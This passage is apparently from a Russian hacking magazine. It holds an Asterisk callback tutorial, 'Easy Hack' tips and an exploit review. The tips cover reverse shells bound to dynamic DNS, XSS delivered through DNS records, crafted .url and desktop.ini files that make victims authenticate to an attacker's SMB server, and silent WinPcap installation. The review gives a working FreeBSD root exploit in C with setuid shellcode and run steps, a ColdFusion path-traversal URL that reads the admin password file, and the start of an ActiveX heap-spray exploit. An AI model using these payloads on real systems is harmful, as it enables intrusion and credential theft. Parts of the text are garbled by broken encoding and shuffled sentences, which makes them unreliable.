Отредактируем контекст ivr-pass и создадим новый callback: [ivr-pass] exten => s. происходит подключение к базе и обновление PIN-кода в таблице.1.n.. и имя call-файла ($2 в скрипте). Когда новый PIN введен.1. Таким образом и происходит обратный вызов. RetryTime — время между повторениями. У меня при звонке через sim-dialer от момента вызова номера в контакт листе до «гудков» на набранный номер уходит примерно 20-25 секунд.n. у абонента вместо этого будет высвечиваться номер VoIP-оператора. Как вариант. после чего дается 10 сек на ввод нового PIN’а. выглядеть он будет так: #!/bin/bash echo Channel: SIP/blabla1/$1 > /tmp/$2 echoMaxRetries: 2 >> /tmp/$2 echoRetryTime: 3 >> /tmp/$2 echoWaitTime: 20 >> /tmp/$2 echo Context: ivr-pass >> /tmp/$2 echo Extension: s >> /tmp/$2 echo Priority: 2 >> /tmp/$2 echo Archive: Yes >> /tmp/$2 mv /tmp/$2 /var/spool/asterisk/outgoing Готовый файл называем callback. а не копировать). :)z 037 . с которого начнется обработка (укажем 2) Archive — если поставить Yes. Москва и межгород. Предлагаю написать нужный нам скрипт на Bash — это проще и быстрее всего. Но я готов ждать :).1) exten => s. Как же это сделать? В Астериске есть так называемые call-файлы. выполнение которого начнется после поднятия трубки. когда возьмут трубку (пишем тут s). который отвечает за смену PIN’а: сначала воспроизводится «бииип». GoToIf($["${EXTEN}" = "${pin}"]?ivr. Bash. exten =>s. чтобы мы не тратились на исходящие звонки с сотового.Background(beep) exten => s.n.n.AGI(callback.MYSQL(Query resultid ${connid} update callback set `pin`=${EXTEN} where phone=${CALLERID(number)}) exten => _XXXX. что наша callback-система должна сама перезванивать. Внешний скрипт можно написать на Perl. на который будем перезванивать. все работает! Однако в самом начале статьи мы говорили о том. и так два раза. название транка и номер телефона.Hangup() В контексте ivr-out прописаны исходящие звонки. подставляя нужный номер. blabla2 или blabla3.Hangup exten => t.n. то будем перезванивать.Hangup() [ivr-ch-pin] exten => s.Hangup() exten => i. которые позволяют инициировать вызов и соединять два номера. В контексте ivr-ch-pin.

заграничная практика — все доки выкладывать в pdf’ках. утечка здесь. Но вернемся к делу.no-ip.com/metadata). âåðñèÿ îôèñà è ÎÑ. где требуются возможности по привязке. не палясь. Интересный момент: олдскульная тулза по извлечению метаданных (tarasco. но нашел две отличные статьи. особенно за границей. так как при конвертации удаляется большая часть метаданных. да и просмотрщики есть (smartpctools. в которых все конкретно описано.dyndns. который при выходе в сеть будет отправлять на бесплатный сервис HTTP-запрос вида: GET /nic/update?hostname=èìÿ_æåðòâû&myip=åå_ip HTTP/1. что все действия легальны (в смысле. Фишка таких DNS в установке маленького времени на устаревание записей — около пары-тройки минут. freedns. ¹2 ЗАДАЧА: ПРИВЯЗАТЬ ДИНАМИЧЕСКИЙ IP К DNS РЕШЕНИЕ: Иметь доступ к своему домашнему компу — это и приятно. стоит вспомнить кучку скандалов. afraid.html) умеет доставать версию ОС. Просмотреть всю инфу можно ручками. Там же есть описание. www. а к именам (reverse_tcp_dns. Повесишь жертве «сервачок». на которой был создан файл. используя так называемые Dynamic DNS.0 Host: dynupdate.0.com Easy Hack ¹1 ХАКЕРСКИЕ СЕКРЕТЫ ПРОСТЫХ ВЕЩЕЙ ЗАДАЧА: ПРОСМОТР МЕТАДАННЫХ В ОФИСНЫХ ДОКУМЕНТАХ РЕШЕНИЕ: Ни для кого не секрет. XÀÊÅÐ 10 /141/ 10 . ничего трудного) — habrahabr. потому другие DNS не помещают их в свой кэш. Другие тулзы этого не умеют. особенно если наша цель — корпоративная сетка. Решается сия проблема. org/security/reversing_ole/index. и есть доступ к файл-серверу с общими доками. чего мы можем добыть из метаданных: èìÿ ïîëüçîâàòåëÿ. найти ее по имени — приятно :). Вторая 038 Метаданные в каком-то doc-файле: версия ОС и офиса.microsoft. как оно делается. В них присутствует разнообразная инфа. Также Майкрософт выпустила тулзы для чистки. В России метаданными редко кто пользуется. Вот только большинство провайдеров внешний айпишник выделяют только за денежку. âñå ïóòè õðàíåíèÿ ôàéëîâ. reverse_https в MSF). примерный список. ничего при этом не ломая). есть много сфер. В общем-то. реверсовые шеллы можно привязывать не к статическим IP. и полезно. Я было хотел написать. Утечка там. Главное.ru/ blogs/linux/101380. ñîçäàâøåãî è ïîñëåäíåãî ðåäàêòèðîâàâøåãî ôàéë. Пробежался по ним — и уже собрал пачку инфы.com. Но и с pdf’ками в том же стиле какие-то скандалы были. èìåíà ïðèíòåðîâ â ñèñòåìå.. На самом деле. Но с точки зрения безопасности там может сохраниться и конфиденциальная информация. какая инфа хранится. Большую часть метаданных можно почистить/посмотреть прям в Офисе или в Винде в свойствах файла: http://support. что доки и в веб выкладывают. è åùå âñÿêàÿ áóðäà :). что документы из офиса (и не только) содержат в себе метаданные. Итак.com/kb/825576/ — описалово. Вообще. на испанском). íàçâàíèå îðãàíèçàöèè. Например..org и www. ïî÷òà ïîëüçîâàòåëÿ. êîììåíòàðèè. А бывает.ВЗЛОМ Тюрин «GreenDog» Алексей agrrrdog@gmail.no-ip. èìÿ êîìïüþòåðà. где она это берет (жаль. ñêðûòûé è óäàëåííûé òåêñò.1a И всегда можешь. имена пользователей. плюс есть еще куча аналогов от сторонних разработчиков. и к нам притекает :). и как ее почистить ручками. Все утекает куда-то. но умный офис «самое важное» сохраняет за них.ru/blogs/webdev/101336. формат офисовских документов доступен. о поднятии своего динамического DNS (кстати.com Authorization: Basic ëîãèí_è_ïàññ_â_base64 User-Agent: blah-blah-blah v. В первой — все этапы настройки с привязкой к бесплатным сервисам (типа. Или прошлых жертв с динамическими IP находить. вроде даже нужная и полезная в определенных ситуациях. да и вообще ни у кого об этом ни слова (смотри ссылку выше на сайт МС). мы просто смотрим файлики. Но мы-то смотрим с другой стороны. О важности такой инфы даже говорить не стоит.com) — habrahabr.

когда p0f вешают на шлюз и таким образом получают инфу обо всей подсети. в которых частенько бывают всевозможные резолверы. Что не очень удобно — нам надо.txt Или скормим ему pcap-файл и установим детект по RST-пакетам: p0f -R -s test_osdetect. В большинстве DNS-записей нельзя использовать пробелы. чтобы жертва либо сама коннектилась к нам. поля. то есть нас обнаружить невозможно. Первые крупные работы по этой теме появились еще в 1999-2000 годах (когда-то этим и мы занимались. который через браузер просмотрит инфу об имени нашего сервера. и. Кстати. Зачем оно надо? Рон привел простенький пример. Так что если есть мысли — поделись с автором тулзы.org/blog/?p=433) о встраивании яваскриптов в DNS-записи и для этого написал прогу– dnsxss (входит в nbtool). так и имеют. алгоритм их изменения. но не IE (мотаем на ус :). получается. Идея в том. Рон. целью могут быть.. Палево небольшое. например). ведь теперь.org/book/osdetect. К тому же. да не совсем. ¹4 что сервисы выводят ответы от DNS-серверов без фильтрации! То есть человек. Сделать это можно разными путями: и из баннеров всевозможных сервисов. можно поучаствовать в бета-тестировании новой версии набора nbtool — 0. на них нашли различные ответы. очень часто производится нормализация пакетов на файрволах. настройки сети. XÀÊÅÐ 10 /141/ 10 Детектим ОС через EttercapNG RST— сброс соединения (когда порт закрыт. поковырять его в «домашних условиях». под которой сидит наша жертва. Прога может использовать один из четырех методов: по пакетам с выставленным SYN (по умолчанию) и SYN-ACK.. Проблема в том. что нельзя сказать об активном. менее точен.org/wiki/index. Версии есть под все основные ОС. К тому же. как обычно. ACK — в передаче данных (совсем экспериментальный). эффективность его с годами особо не ухудшилась — разные производители как имели свои решения всех тонкостей стека. Просторы для полета фантазии и новый вектор атаки :). но! Во-первых.html). Есть много тонкостей в реализации — какие использовать изначальные значения для полей? Как менять их по ходу соединения? Как отвечать на нестандартные запросы? И в каждой конторе. в активном к этому добавляется отправка жертве всевозможных нестандартных пакетов и просмотр реакции на них. во-вторых. в общем. и по набору открытых портов. и с UDP) четко расписан в RFC: взаимодействие. получит наш ява-скрипт. имея свой DNS. например. реализовав XSS для нескольких публичных сервисов с DNS-lookup’ом. как решение. пример XSS — это только «наметка». У пассивного метода есть еще один «бонус». запуск p0f на прослушку интерфейса (-i) eth0 с выводом полученных сигнатур (-S) и сохранением в файл (-o): p0f -i eth0 –S –o os. и FF нормально воспринимал HTML.. мы с помощью dnsxss можем подделывать DNS-ответы и встраивать в них яваскрипт код. заголовки. Что еще лучше — разница чувствуется в поколениях ОС. Например. Протокол IP и TCP(есть методы и с ICMP. или логи с автоматическим резолвом имен. но зато мы не отправляем никаких данных нашей жертве. Для проведения любой более-менее осмысленной атаки нам чаще всего требуется определить ОС. он входит в BackTrack 4. Пассивный. так что тема уже хорошо прожевана и много всего интересного можно быстро прогуглить (nmap. наснифав у жертвы трафика. что анализирует поля TCP/IP-протоколов начальные значения. например. требуются. эх.cx. на активный и пассивный. файерволы. Пассивный занимается тем. php/Nbtool). А для ускорения сбора можно добавить «активности». Кроме детекта ОС прога умеет выявлять NAT. а для HTML. ОС-фингерпринтинг делится. то есть для нормального взаимодействия различных систем хватает.¹3 ЗАДАЧА: ЗАПИХНУТЬ ЯВАСКРИПТ В DNS-ЗАПИСИ РЕШЕНИЕ: В майском номере ][ я рассказывал про организацию туннеля через DNS-протокол (если точнее — о шеллкоде). Четко. они. Скачать и почитать доки о нем можно тут — lcamtuf. Жаль. Но есть злобный метод — на основе анализа протоколов стека TCP/IP.pcap 039 . Осуществлялось это через набор тулз — nbtool от Ron’а Bowes (skullsecurity.coredump. Но это не отрицает ее важности и теперь. анализ пакетов на установку соединения. Казалось бы.05. и используя СИ :). просканить сеть с поддельного IP’шника. Вообще. использовал символ «/» вместо них. так как сам подход оригинален (совмещение таких разных вещей) и жаждет дальнейших исследований. либо как-то прослушивать ее трафик. что официальная разработка остановилась в 2006 году. детство-детство :)). Так что можно. Для каждого из методов своя сигнатурная база. а. что. Но по инету еще раскидано несколько «доделок».. Одним из лучших пассивных ОС-фингерпринтеров является p0f. сейчас есть одна проблема. Что еще хорошо — она умеет работать с pcap-файлами. например. в которые можно подпихнуть свой код. обычная практика. ПАССИВНЫЙ МЕТОД РЕШЕНИЕ: Вернемся к классике. ничего чрезвычайного. веб-админки. Не так давно он запостил безумнейшее изыскание в своем блоге (skullsecurity. если правильно все организовать. производящей ОС. ЗАДАЧА: УДАЛЕННО ОПРЕДЕЛИТЬ ВЕРСИЮ ОС ПО ФИНГЕРПРИНТУ СТЕКА TCP/ IP.

В них можно указывать путь к нашему серверу. Существуют правила по соблюдению конфиденциальности. как Проводник винды обрабатывает некоторые виды файлов. url (ярлыки интернета) и desktop. на котором мы уже и выполняли бы все необходимые действия с хешиками пользователей. кредитной истории и номера страховки. А последний. который ссылается на наш сервер. Запустить ОС детект в Ettercap можно так (в GTK.org/invasion-ofprivacy. по сравнению с 200 у p0f. что хуже. ведь если что-то попало в Сеть. Автор обещал реализовать идею в Nmap. 040 1)Sniff — Unified sniffing 2)Start — Start sniffing 3)View . заморочится и сделать свою. Как уже говорилось ранее. XÀÊÅÐ 10 /141/ 10 . Причем на живом человеке. чтобы жертва подсоединилась к нашему злосерверу. но найти кого-либо физически — не такая уж и проблема.net). От IP-адреса до фото всей семьи. Но есть еще одно решение. что для этого требуется — парочка поисковиков и публичные сервисы. dca. Кроме атак по SMB можно организовать общий «сбор информации» через тот же p0f или слежку за юзером. как известно. dns lookup и т. либо порыскать в Сети — там есть. И это не говоря о таких вещах. Заострим внимание на этом — как заставить их подключиться? Очень удобно для таких вещей пользоваться стандартными возможностями Windows. а остальные опции смотри в хелпе. Безумнейший пример показан в статье attackvector.com IconFile=\\evilserver\ipc$ Где IconFile — указатель на файл иконки. хотя это требует доступ к общему ресурсу в сети или к компьютеру жертвы. исследования ОС детекта не остановились.ufrn.example. К ним относятся Ink (ярлыки). Пишем в текстовый файл следующее и сохраняем с расширением url: [InternetShortcut] URL=http://www.ini (настройка отображения папок).br/~joaomedeiros/gsoc/2009/proposal/node1. я имею в виду то. используя регулярные выражения tcpdump’а. типа whois. не обновляются базы сигнатур. И когда пользователь будет просматривать папку с этими файлами через Проводник (TotalCommander вроде ведет себя также). что в интернете можно найти кучу информации о человеке/организации даже по небольшой зацепке. живет и развивается.ВЗЛОМ Определяем ОС по RST-пакетам из pcap-файла Также можно выставлять интерфейс на прослушку (promiscuous mode) параметром «-p» и устанавливать фильтр на пакеты. создаем url-файл. Например. и появляется что-то новое. конечно. заложенной в p0f). как социальные сети. Возможности p0f’а встроены в Ettercap (ettercap. то останется там навсегда. sourceforge. Себя я нашел тремя различными путями! Говоря про «стандартные возможности». curses-интерфейсе): ¹5 ЗАДАЧА: СОБРАТЬ ИНФОРМАЦИЮ О ЧЕЛОВЕКЕ РЕШЕНИЕ: Ни для кого не секрет. Итак. и. ¹6 ЗАДАЧА: СКРЫТНО ЗАСТАВИТЬ ЖЕРТВУ ПОДКЛЮЧИТЬСЯ К ОПРЕДЕЛЕННОМУ ХОСТУ РЕШЕНИЕ: В майском номере я писал о SMB relay-атаках. что нам и требуется. Офигеть :). Одним из важных мест в них была необходимость в том. Вот и базы его имеют около 1200 сигнатур. где мы сами публикуем свою подноготную.html — забавнопоказательная работа 2009 года про фингерпринт на основе анализа TCP ISN множества пакетов (развитие идеи. p0f уже официально не развивается. И это без социальной инженерии.Profiles Кстати. А все.д. Можно. В нашей стране ПОКА ЧТО все не так жестко. но и они не особо спасают. то Проводник автоматически подключится к нашему серверу и попытается авторизоваться.

С lnk точно такая же логика.ini. что все достаточно просто. разве что для генерации lnk-файлов: payload. На нем же выложена тулза (tarasco. что палевно.ini. Что самое приятное — библиотеки WinPCap не палятся антивирусами (как бы и повода нету). Можно стандартными средствами винды создать ярлычок и в его настройках прописать путь до иконки. подгружает иконку с нашего сервера. Но это тоже можно поправить. но то ли он не так хорош. Им. а потом изменить его в HEХ-редакторе.exe -t l -d \\evilserver\ipc$ Где –t l — указываем тип — lnk-файл. В нем можно задать путь до иконки.dll" â C:\WINDOWS\system32\ 3)"pthreadVC. но если прописать драйвер npf.sys в папку с дровами. Сделать папку системной можно командой в консоли: attrib +s èìÿ_ïàïêè Зато у методов с иконками есть косяк — если ссылаться не на иконку. то это ограничение снимается.dll" â C:\WINDOWS\system32\ 2)"Packet. Требуется всего лишь скопировать файлы: XÀÊÅÐ 10 /141/ 10 Первые три можно не копировать в системную директорию. но и реакция Проводника будет разной: В IconFile — читается. InfoTip — когда выбирают папку с desktop. в прошлом номере я писал про meterpreter через icmp-туннель. в которой лежит наш desktop. Смысла большого в ней не вижу.html). которая может быстренько генерить файлы перечисленных видов. потому обнаружить их достаточно трудно. WinPcap нужен. К тому же.ini заработал. Вот только формат ярлыка не позволит отредактировать его в текстовике. Оказалось. Как обычно. Вот в том же Metasploit’е есть модуль для удаленного снифинга трафика. когда проводник входит в папку. доступ к raw-сокетам есть.-1 IconFile=\\evilserver\ipc$ Для того. После поставленной задачи были проведены небольшие изыскания.ini=@\\evilserver\ipc$.sys на загрузку при старте системы. -d — путь к нашему серверу. пользователь же ничего плохого заметить не может — ярлык может ссылаться на что-то нужное. Проводник. к сожалению. нам все равно нужно копировать npf.URL — куда перейдет пользователь. который также требовал WinPcap для своей работы. z 041 . и проблема решилась. хотя различные разработчики ПО «тихий установщик» и предлагают за денежку. LocalizedResourceName — аналогично. то есть и права нужны соответствующие.ini и всеми методами: [.ini — когда Проводник входит в папку. При взломах это напрягает. а во-вторых. Пример с desktop. каждому ПО потребуются свои библиотеки. Далее — desktop. во-первых.dll" â C:\WINDOWS\system32\ 4)"npf. В нем можно прописать ссылки на наш сервер в разных местах. для каждой ситуации свое.ini. что и прогу. как минимум. desktop. а кинуть в ту же папку. если запустит этот файл. либо из-за удобства (совместимость с libpcap’ом) пользуются именно WinPcap. При этом.ShellClassInfo] desktop. плюс классические — вставка ссылок в html и doc (ppt.-1 InfoTip=@\\evilserver\ipc$. то пользователю будет отображаться стандартная виндовая иконка неизвестного файла. то есть на машине жертвы. заходя в папку с этим url-файлом. которой нужен WinPcap.org/security/payload/index. Автоматический коннект к удаленному ресурсу при просмотре папки ¹7 ЗАДАЧА: ВТИХАРЯ УСТАНОВИТЬ WINPCAP 1)"wpcap. чтобы desktop. просто так в Винде не работают. начиная с XP.-1 LocalizedResourceName=@\\evilserver\ipc$. где находится подпапка. xls) файлы. По идее. Это файл настройки отображения системных папок. но под Win не работает (к сожалению). есть одно требование — он должен лежать в системной папке. Данные способы были почерпнуты с уже упомянутого сайта парочки ресерчеров. При использовании библиотек также требуются админские права. и все вместе почти ничего не весят (500 Кб).sys" â C:\WINDOWS\system32\drivers\ РЕШЕНИЕ: Большинство самых приятных хакерских штуковин.

Вот и все. endstream endobj 15 0 obj << /Type /FontDescriptor /Ascent 750 /CapHeight 676 / Descent -250 /Flags 32 /FontBBox [-203 -428 1700 1272] /FontName /CSDIZD+TimesRoman /ItalicAngle 0 /StemV 0 /MaxWidth 1721 /XHeight 461 /FontFile3 13 0 R >> endobj Собственно.X CVE CVE-2010-1797 BRIEF Перед нашими глазами отличный пример того. а не компилировать. будет в следующей версии прошивки. где — надо курить ман по CFF). Ни поднять тебе SSH-сервер.0. где. как. /Filter[/FlateDecode] /Length 10709>> stream xœí} t ×μî‘-ƒldc0! . Перво-наперво взглянем на содержимое PDF-файла: 13 0 obj <</Subtype/Type1C 042 Пока этот эксплойт используется только для Jailbreak'а.sintsov@dsec. Дословно переводится как «побег из тюрьмы строго режима им. где у нас описан Type1C-шрифт.. тем не менее. попади это оружие в руки «злых» дядей. которая используется для получения прав root'а через вторую уязвимость (при выделении памяти в IOSurface). XÀÊÅÐ 10 /141/ 10 . кто все же использовал Jailbreak.X/4. Пока таких случаев не выявлено. так как оставляют без денег производителей ПО для магазина AppStore. iPhone. Такие «патчи» нелицензионны и аморальны (но законны). В итоге боевая нагрузка заключается в том... Как видно. которая при открытии PDF-файла предупреждает об угрозе. Отмотаем скроллер пониже — открытым текстом библиотека. которая легко декодируется с помощью PDFTK (скачать с гуи-интерфейсом можно тут: paehl. а вторая — в ядре iOS. Digital Security a. есть возможность установить предупреждалку. SOLUTION EXPLOIT Кое-что. Так вот. В результате вместо каши мы получили почти читаемый код.de/pdf/gui_pdftk. ни скомпилить второй квейк. где вырезано много байт? Судя по тэгу /Filter[/FlateDecode]. Стива Джобса». что последний Jailbreak.ru ÎÁÇÎÐ ÝÊÑÏËÎÉÒΠ01 ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО КОДА ПРИ ОТКРЫТИИ PDF-ФАЙЛА В IOS TARGETS Apple iPhone 3/3G/3GS Apple iPod Apple iPad Apple iOS 3. и далее. ROP-программа. âûðåçàíî ìíîãî áàéò. Посему хакеры регулярно выкладывают так называемые Jailbreak’и. что все мы знаем про такой популярный и модный продукт. вернее сначала мы видим CFF-описание. видимо. что торгует софтом для яблочных девайсов. Понятно. где есть триггер уязвимости (точно неизвестно.. что наши действия в этом потенциально отличном девайсе сильно урезаны. 15 объект ссылается на описание шрифтов. чтобы закачать Jailbreak-софт. судя по всему. Детали эксплойта не особо распространяются. получить рута (и тем самым выбраться из песочницы — защитного механизма iOS) и установить его. то вполне возможна попытка построения ботнета на основе Apple-устройств. об том эксплойте известно. оно и понятно. патча еще нет. использовал уязвимости 0day в ПО Apple. В формате описания (CFF .. но не за такие деньги. встроенной в телефон.. Для тех. как уязвимость и эксплойт работают на «благо» пользователей. но. Так причем тут обзор эксплойтов? Да при том. что телефон должен звонить. внедрение кода было осуществлено через две 0day уязвимости: одна в PDF-читалке. значит. на объект 13 (/FontFile3 13 0 R). Таким вот образом можно весело расширять функционал iPhone — с помощью хороших эксплойтов. Результат работы был продемонстрирован на Defcon 18. не исключены модификации.Compact Font Format) и скрыта ошибка. А что у нас там. там у нас «закодированая» область. судя по всему. Дело в том..html). Кроме того. который был реализован твиттер-юзером @comex и его командой (iPhone Dev Team).. тут и зарыта первая уязвимость — ошибка при обработке Type1C-шрифтов. ведь эта брешь еще не исправлена. происходит захват стека через переполнение буфера. например.ВЗЛОМ Алексей Синцов. все же. а. Также мы знаем.

Рассмотрим теперь эксплойт (заточен он под x64 и под x32. можно изменить /bin/sh. Например. которые передаются по сети. как понятно.. В этой памяти могут храниться. добавив в него код. Впоследствии товарищ Kingcope опубликовал эксплойт. char buf[10000]. что логично. Но программисты из Бэркли совершили одну маленькую ошибочку. Системный вызов sendfile() используется для передачи содержимого файла (по открытому дескриптору) в сокет. Данная уязвимость позволяет легко получить права root’а в системе. int flags. Такое дублирование происходит при использовании sendfile(). char *argv[]) { int s. рассмотрим некоторые объекты ОС. реализующий эту уязвимость. вернее. В ОС (FreeBSD) для организации межпроцессного взаимодействия и для работы с сетевой подсистемой используется специальный объект памяти — mbuf. Собственно уязвимость кроется в реализации mbuf. f. Это фактически означает.. То есть. ÷òî äàííûé ïðîöåññ áóäåò // èìåòü ïðàâàìè âëàäåëüöà ôàéëà. åñëè åãî çàïóñòÿò… char str32[]= "\x31\xc0\x6a\x00\x68\x70\x2f\x73\x68\x68\x2f\x2f\x74\x6d\x89\xe3" "\x50\x50\x53\xb0\x10\x50\xcd\x80\x68\xed\x0d\x00\x00\x53\xb0\x0f" "\x50\xcd\x80\x31\xc0\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d" "\x70\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80". struct sockaddr_in addr. // Øåëëêîä — ñòàâèò /tmp/sh âëàäåëöà root è sticky bit // ÷òî îçíà÷àåò. ограничение «только для чтения» не копируется в новом указателе (в флагах). При этом. Давайте взглянем подробнее. если совсем грубо — отправка содержимого файла по сети. XÀÊÅÐ 10 /141/ 10 main (int argc. 043 . что можно модифицировать фалы. которые для записи недоступны (опять же — в кэше файловой системы). рассмотрим только x32): CVE-2010-2693 BRIEF Интересная уязвимость в ОС FreeBSD была обнаружена исследователем Ming Fu.iPhone. а именно — дескриптор сокета будет влиять на mbuf. а в эксплуатации помогает именно sendfile(). который дает права root. для данных файла используется mbuf. например. Прежде чем начать описание эксплойта. пакеты.x CVE В чем же ошибка? При вызове sendfile() mbuf-блоки представляют собой указатели на содержимое файла в кэше файловой системы.x FreeBSD 8. совсем крохотную — при дублировании ссылки на mbuf-блок права копируются некорректно. Уязвимость в PDF EXPLOIT iPhone — Jailbreak в действии 02 ПОВЫШЕНИЕ ПРИВИЛЕГИЙ В FREEBSD TARGETS FreeBSD 7. При этом указатели эти доступны сугубо для чтения. k2.

if (arch == 1) { XÀÊÅÐ 10 /141/ 10 . off_t sbytes. NULL. chunk = 0.chunk. sizeof (addr)). flags). int chunk. continue. F_SETFL.0.chunk. if (n < 0) warn ("fail to connect"). &sb).NULL.sin_addr. n = connect(s. } chunk = 2048. n = fstat(f. (struct sockaddr *)&addr. с которых тянется «обновление» char *p.sin_family = AF_INET. int n. if (arch == 2) n = sendfile(f.0.ВЗЛОМ Kingcope издевается над FreeBSD size = sb. if (arch == 1) n = sendfile(f. int64_t size. int arch = 3. sizeof buf).st_size. //Îòêðûâàåì /bin/sh íà ÷òåíèå f = open("/bin/sh". if (chunk > 0) { sbytes = 0. Декодированные строки URL. if (n<0) warn("fstat failed"). SOCK_STREAM. //øëåì îòêðûòûé ôàéë ÷åðåç sendfile() â öèêëå while (size > 0) { FD_ZERO(&wset).s_addr = inet_addr("127. addr. sizeof(addr)). NULL). iPhone. &wset). n = select(f+1. F_GETFL).NULL. chunk -= sbytes. 044 memset(buf. if (n < 0) continue. 0). if (n < 0) continue.1"). bzero(&addr.1204*6. //íåáëîêèðóþùåå ÷òåíèå flags = fcntl(f. flags |= O_NONBLOCK. fcntl(f. addr. '\0'. struct stat sb. //îòêðûâàåì loopback ñîåäèíåíèå s = socket(AF_INET. size -= sbytes.&sbytes. addr.0). fd_set wset. sent += sbytes.2048*2. FD_SET(s. O_RDONLY). off_t sent = 0.&sbytes. NULL. &wset.s.sin_port = htons(7030).0).s. if (f<0) warn("fail to open file").

За это время. по сути. в скриптах которой обнаружена возможность обхода директорий и доступа к произвольным файлам.ext_type.. } /* 04 ОБХОД КОРНЕВОЙ ДИРЕКТОРИИ В COLDFUSION TARGETS X ColdFusion 9 ColdFusion 8 ColdFusion 7 CVE CVE-2010-2861 BRIEF ColdFusion — достаточно известный и популярный язык программирования для Web. это еще и удобная платформа для развертывания своей системы. Но.6 +302. p = buf. например так: 045 .sys/kern/uipc_mbuf. Уязвимость была обнаружена Ричардом Брайном (Richard Brain). который изменит права и владельцев /tmp/sh и запустит /tmp/sh2. EXPLOIT Для некоторых скриптов платформы можно указать локаль — язык шаблона. Тем не менее. //Ïîñëå nop’îâ äîáàâëÿåì øåëëêîä memcpy(p.7 @@ n->m_ext. + n->m_flags |= m->m_flags & M_RDONLY./cache i386 Теперь ждем около пяти минут. возможно. с админкой и всем таким прочим. добавляет забытый флаг — M_RDONLY.. XÀÊÅÐ 10 /141/ 10 ColdFusion — входим в админку SOLUTION Имеется патч. ====================================================== --.k2<256. n). sizeof str32). для начала надо сделать копии /bin/sh в tmp: cp /bin/sh /tmp/sh cp /bin/sh /tmp/sh2 Затем на втором терминале (ALT+F2) открыть netcat. ПО без ошибок не бывает. p. чтобы слушать порт. получится повредить кэш-память с содержимым /bin/sh. n = k2 + sizeof str32. } } Таким образом. n->m_flags |= M_EXT.ColdFusion — получаем хеш //nop’û for (k2=0. str32.k2++) { buf[k2] = 0x90. } //Ïèøåì øåëëêîä ïðÿìî â ñîêåò //ïîñëå ìíîãîêðàòíîãî sendfile //Åñòü âåðîÿòíîñòü ïåðåçàïèñè mbuf //óêàçûâàþùèõ íà êýø ñ ôàéëîì. nc -l 7030 После этого скомпилируем и запустим эксплойт: gcc cache.c (working copy) @@ -302. как известно. Кроме того.c (revision 209948) +++ sys/kern/uipc_mbuf./bin/sh write(s. что несомненно. } p = buf. с чем нас и поздравляю. который. После этого смело запускаем / tmp/sh. эксплойт просочился в паблик от некого анонимного лица. и мы — root.ref_cnt = m->m_ext. удобно.c -o cache .ext_type = m->m_ext. //êîòîðûé ìû îòïðàâëÿëè . n->m_ext.ref_cnt. p = p + k2. который сообщил об этом Adobe. Так и с платформой ColdFusion. куда файл слать будем.

как свойственно любому ПО./. — 0x0C. был абсолютно не рабочим. В основ- 046 46 // Øåëëêîä — Skyland win32 bindshell — îòêðûâàåò íà 28876 TCP-ïîðòó cmd. так как данный продукт — это ActiveX-компонент. файл с паролем администратора от платформы. и.value. âñòàâëÿÿ òóäà çàïèñàííîå íàìè çíà÷åíèå.8 CVE N/A <html> //CLSID FathFTP — ïîäãðóæàåì óÿçâèìûé ìîäóëü <object classid='clsid:62A989CE-D39A-11D5-86F0B9C370762176' id='target'></object> <script> BRIEF FathFTP — это программа стоимостью 79 долларов США. â ïîëå äëÿ ïàðîëÿ çíà÷åíèå óêðàäåííîãî õåøà. а потом сам шеллкод). Соответственно. что приводит к перезаписи данных в стеке. Обработчик этот.loginform. эксплойт: http://server/CFIDE/administrator/enter. который был выложен в паблике./. что данный дескриптор служит для исключительных ситуаций — например. При этом «ru» — это. например. Дело в том.. нужно выйти «красиво»./ColdFusion8/lib/password... которая используется для доступа к FTP-серверу и работы с файлами. для этого достаточно добавить Heap Spray (или точно вычислить адрес буфера с шеллкодом) и заменить указатель SEH на адрес с шеллкодом. включая адрес обработки исключительной ситуации. nop’ слайс — пустые операторы. 7. Çàïèñûâàåì ïîëó÷åííîå çíà÷åíèå.cfm). Мы перезаписали этот обработчик. и который мы тоже перезаписали). Íèëüñ ðåêîìåíäóåò Burp. что Heap Spray — это просто большой массив в памяти браузера. если что-то пошло не так. SOLUTION Вообще. что вызовет обработку исключительной ситуации. чтобы «конец» был валидным. на самом деле. приставка к файлу с языковыми шаблонами. собственно.. Какие.com/support/security/bulletins/apsb10-18. и все. что в админке есть задания по расписанию. что-то в программе пошло не так. Так. тут есть ошибки.. что привело к искажению значения. Но./. Тогда скрипт будет рад — в конце «en». В итоге при копировании данных возникает ошибка — указателя-то больше нет./». Сам эксплойт прост до безумия: TARGETS FathFTP 1. например. что лежит в памяти за переменной../. Некоторые байты в буфере при переполнении были не ASCI-символами. например. мы имеем дело с переполнением буфера в стеке. Функция начнет обрабатывать параметр и скопирует его в свою переменную. Содержимое строки.. а при открытии файла он «обрубится» благодаря нулевому байту. заменив его каким-то мусором. которое приводит к выполнению произвольного кода.. чем 1540 байт. Ââîäèì íà ñòðàíèöå àóòåíòèôèêàöèè (/CFIDE/ administrator/enter. /.. Огромную строку размером 1540 байт. Поэтому содержимое этого массива будет интерпретировано как исполняемый код и исполнено. но памяти для переменной выделено меньше. ÿ æå ïîëüçîâàëñÿ TamperData-ïëàãèíîì äëÿ FireFox. Именно для этого и служит обработчик исключительных ситуаций. Тогда программа ищет последний обработчик исключений (который тоже в стеке. 2. адреса дескриптора SEH. куда указывал автор эксплойта. так как ColdFusion проверяет. Напомню. чтобы адрес с шеллкодом можно было просто угадать — тыкаешь в середину памяти. В итоге остальные байты строки будут скопированы вне буфера в стеке. 4. Çàïóñêàåì MITM-ïðîêñè. который мы создали в самом начале (Heap Spray). затирая все то. чтобы не упасть в лужу. Затем вызываем функцию компоненты — FileExists().. Æìåì êíîïêó íàçàä — îïÿòü îêàçûâàåìñÿ íà ñòðàíèöå àóòåíòèôèêàöèè. где мы пишем шеллкод.properties.  àäðåñíîé ñòðîêå ââîäèì javascript:hex_hmac_ sha1(document. который и будет выполнен. Программа возьмет адрес обработчика из стека./. однако эксплойт был проверен только на восьмой ветке. Ìû â àäìèíêå! Доступ к панели администратора дает полный доступ к системе. cfadminPassword. все байты. Вот. Но этого недостаточно. После этого произойдет сбой в работе функции при копировании данных.  ïåðåõâà÷åííîì Post-çàïðîñå ðåäàêòèðóåì ïîëå cfadminPassword. На самом деле такие эксплойты за 10 секунд можно превратить в рабочие. совершенная шляпа. Тогда алгоритм следующий: сначала создаем большой динамический массив с большим куском пустых операторов — nop’ов (оп код — 0x90). поэтому управление перейдет по адресу 0x0C0C0C0C. устраняющий проблему: adobe. EXPLOIT 